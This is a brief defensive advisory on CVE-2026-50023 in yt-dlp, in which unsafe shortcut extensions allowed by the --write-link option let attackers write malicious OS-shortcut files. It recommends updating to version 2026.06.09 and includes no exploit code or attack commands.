CVE-2026-50023 yt-dlp CVE debrief

Who should care

This vulnerability affects users of yt-dlp who use the --write-link option or its variants. System administrators and users who download media or subtitles using yt-dlp should be aware of this vulnerability and update to version 2026.06.09 or later to prevent potential exploitation.

Technical summary

CVE-2026-50023 is a vulnerability in yt-dlp that allows remote attackers to write arbitrary OS-shortcut files to the user's filesystem. The vulnerability exists because the allowlist for the --write-link option includes unsafe extensions like .desktop, .url, and .webloc. An attacker can exploit this by writing malicious OS-shortcut files during media or subtitles downloads. The vulnerability has a CVSS score of 8.3 and is classified as HIGH severity. It is fixed in yt-dlp version 2026.06.09.

Defensive priority

High priority should be given to updating yt-dlp to version 2026.06.09 or later. Users should also be cautious when downloading media or subtitles using yt-dlp and avoid using the --write-link option with untrusted sources.

Recommended defensive actions

• Update yt-dlp to version 2026.06.09 or later
• Avoid using the --write-link option with untrusted sources
• Be cautious when downloading media or subtitles using yt-dlp
• Monitor system logs for suspicious OS-shortcut file creations
• Implement additional security measures to detect and prevent exploitation

Evidence notes

The vulnerability is confirmed by the CVE record and NVD detail. The CVE record provides a description of the vulnerability and its impact. The NVD detail provides additional information on the vulnerability, including its CVSS score and severity.

Official resources